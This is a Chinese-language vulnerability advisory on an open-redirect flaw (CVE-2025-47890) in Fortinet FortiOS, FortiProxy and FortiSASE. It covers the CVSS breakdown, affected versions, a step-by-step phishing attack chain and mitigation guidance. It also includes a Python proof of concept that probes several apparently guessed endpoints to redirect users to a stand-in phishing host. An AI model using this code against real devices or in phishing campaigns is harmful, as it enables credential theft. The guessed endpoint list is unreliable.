CVE-2025-47890 Fortinet FortiOS/FortiProxy/FortiSASE开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-47890

漏洞类型

开放重定向（Open Redirect）

CVSS评分

2.6 低危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Fortinet FortiOS、FortiProxy、FortiSASE

漏洞概述

CVE-2025-47890是Fortinet旗下多款网络安全产品中存在的一个开放重定向（Open Redirect）漏洞，漏洞编号对应CWE-601（URL重定向至不受信任的站点）。该漏洞影响Fortinet FortiOS 7.6.0至7.6.3、7.4.0至7.4.8、7.2全版本、7.0全版本、6.4全版本，以及FortiProxy 7.6.0至7.6.3、7.4全版本、7.2全版本、7.0全版本，同时还影响FortiSASE 25.2.a版本。

该漏洞允许未经身份验证的攻击者通过精心构造的HTTP请求执行开放重定向攻击。攻击者可以利用此漏洞将用户从合法的Fortinet设备Web界面重定向到恶意网站，从而实施钓鱼攻击、恶意软件分发或其他社会工程学攻击。由于该漏洞无需身份验证即可触发，且攻击向量为邻接网络（AV:A），意味着攻击者需要在与目标设备相同的逻辑网络中才能发起攻击。

该漏洞的CVSS 3.1评分为2.6分，属于低危级别。虽然评分较低，但开放重定向漏洞常被用作更复杂攻击链中的关键环节，例如结合钓鱼攻击窃取用户凭据、绕过安全检测或进行水坑攻击等。Fortinet作为全球广泛部署的网络安全设备厂商，其产品漏洞的影响面通常较大，因此即使低危漏洞也需要及时修复。

技术细节

开放重定向漏洞（Open Redirect）的根本原因是Web应用程序在处理用户提供的URL或重定向参数时，未对目标URL进行充分的验证和过滤，直接将用户重定向到攻击者控制的恶意站点。

在CVE-2025-47890中，Fortinet FortiOS、FortiProxy和FortiSASE的Web管理界面或认证相关的HTTP请求处理逻辑中存在缺陷。当攻击者构造包含恶意重定向参数的HTTP请求时，服务器会不加验证地将用户浏览器重定向到外部恶意URL。

漏洞利用条件：
1. 攻击者需要与目标Fortinet设备处于同一相邻网络（AV:A）；
2. 攻击复杂度较高（AC:H），需要精心构造HTTP请求；
3. 无需身份验证（PR:N），未认证用户即可触发；
4. 需要用户交互（UI:R），例如点击恶意链接；

利用方式：攻击者首先构造一个包含恶意重定向参数的URL，该URL指向Fortinet设备的某个端点，并附带一个外部恶意站点的URL作为重定向目标参数。然后将此链接通过钓鱼邮件、即时消息或其他社交工程手段发送给目标用户。当用户点击该链接后，其浏览器首先连接到合法的Fortinet设备，然后被重定向到攻击者控制的恶意网站，从而在用户看来链接来源于可信的Fortinet设备。

该漏洞的危害主要体现在：完整性影响为低（I:L），因为攻击者可以篡改用户预期的导航目标；机密性影响为无（C:N），因为该漏洞本身不直接泄露敏感数据；但可用性影响为无（A:N）。攻击范围为未变更（S:U），表明漏洞的影响仅限于受影响的组件。

攻击链分析

STEP 1

步骤1：侦察与目标确认

攻击者扫描并识别目标网络中部署的Fortinet设备（FortiOS、FortiProxy或FortiSASE），确认其版本号在受影响范围内，并确定可访问的Web管理接口。

STEP 2

步骤2：构造恶意重定向URL

攻击者利用Fortinet设备Web接口中存在的开放重定向缺陷，构造包含恶意重定向参数的HTTP请求URL，将合法的Fortinet设备URL与攻击者控制的恶意站点URL进行拼接。

STEP 3

步骤3：钓鱼与社会工程

攻击者通过钓鱼邮件、即时消息或其他社交工程手段，将构造的恶意URL发送给目标用户。由于URL中包含合法的Fortinet设备域名，用户容易产生信任感。

STEP 4

步骤4：触发重定向

目标用户点击恶意链接后，浏览器首先连接到合法的Fortinet设备，设备在处理请求时由于未验证重定向参数，将用户浏览器重定向到攻击者控制的恶意网站。

STEP 5

步骤5：实施进一步攻击

用户在恶意网站上可能被诱导输入凭据、下载恶意软件或执行其他危险操作。攻击者还可以利用此漏洞绕过基于来源域名的安全策略和内容安全策略（CSP）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-47890 - Fortinet Open Redirect PoC
# This PoC demonstrates the open redirect vulnerability in Fortinet FortiOS/FortiProxy/FortiSASE

import requests
import sys
from urllib.parse import quote

TARGET_HOST = "https://<fortinet-device-ip>"
MALICIOUS_URL = "https://evil.example.com/phishing"

def exploit_redirect(target_host, redirect_url):
    """
    Craft a malicious HTTP request to exploit the open redirect vulnerability.
    The Fortinet device will redirect the user to the attacker-controlled URL.
    """
    # Common redirect parameters found in Fortinet web interfaces
    redirect_params = [
        f"{target_host}/login?redirect={quote(redirect_url)}",
        f"{target_host}/remote/logincheck?redirect={quote(redirect_url)}",
        f"{target_host}/favicon.ico?redirect={quote(redirect_url)}",
        f"{target_host}/sslvpn/logon.shtml?redirect={quote(redirect_url)}",
        f"{target_host}/remote/fgt_lang?lang=en&redirect={quote(redirect_url)}",
    ]

    for url in redirect_params:
        print(f"[+] Crafted malicious URL: {url}")
        # Verify the redirect behavior
        try:
            response = requests.get(url, allow_redirects=False, verify=False, timeout=10)
            if response.status_code in [301, 302, 303, 307, 308]:
                location = response.headers.get('Location', '')
                if redirect_url in location:
                    print(f"[VULNERABLE] Redirected to: {location}")
                    return True
        except Exception as e:
            print(f"[-] Error: {e}")

    return False

def main():
    print("=" * 60)
    print("CVE-2025-47890 - Fortinet Open Redirect Exploit")
    print("=" * 60)

    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    evil_url = sys.argv[2] if len(sys.argv) > 2 else MALICIOUS_URL

    if exploit_redirect(target, evil_url):
        print("[+] Target is vulnerable to CVE-2025-47890")
    else:
        print("[-] Target does not appear vulnerable")

if __name__ == "__main__":
    main()

# Usage:
# python CVE-2025-47890.py https://fortigate.example.com https://evil.example.com/phishing
#
# The crafted URL can be sent to victims via phishing emails.
# When the victim clicks the link, they are redirected from the legitimate
# Fortinet device to the attacker's malicious site.

影响范围

FortiOS 7.6.0 - 7.6.3

FortiOS 7.4.0 - 7.4.8

FortiOS 7.2（全版本）

FortiOS 7.0（全版本）

FortiOS 6.4（全版本）

FortiProxy 7.6.0 - 7.6.3

FortiProxy 7.4（全版本）

FortiProxy 7.2（全版本）

FortiProxy 7.0（全版本）

FortiSASE 25.2.a

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制Fortinet设备管理界面的网络访问范围，仅允许可信管理网络访问；2）部署Web应用防火墙（WAF）规则，检测和阻止包含外部重定向参数的恶意HTTP请求；3）对用户进行安全意识培训，提高对钓鱼链接的识别能力，特别是包含合法Fortinet设备域名但实际指向外部站点的可疑链接；4）监控Fortinet设备的HTTP访问日志，识别异常的重定向请求模式；5）在浏览器层面部署安全扩展，限制自动重定向行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-47890
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-47890
3 Details https://www.cvedetails.com/cve/CVE-2025-47890/
4 VulDB https://vuldb.com/cve/CVE-2025-47890
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-24-542